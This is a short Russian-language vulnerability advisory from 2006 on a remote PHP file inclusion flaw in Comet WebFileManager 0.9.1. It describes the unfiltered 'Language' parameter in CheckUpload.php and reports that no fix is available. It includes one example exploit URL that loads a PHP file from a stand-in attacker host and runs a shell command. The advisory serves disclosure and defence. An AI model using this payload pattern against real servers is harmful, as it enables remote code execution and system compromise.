PHP-инклюдинг в Comet WebFileManager

Дата публикации:
14.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
2092
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Comet WebFileManger 0.x
Уязвимые версии: Comet WebFileManager 0.9.1., возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "Language" в сценарии CheckUpload.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls

URL производителя: cwfm.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Cwfm-0.9.1 (Language) Remote File Inclusion

или введите имя

CAPTCHA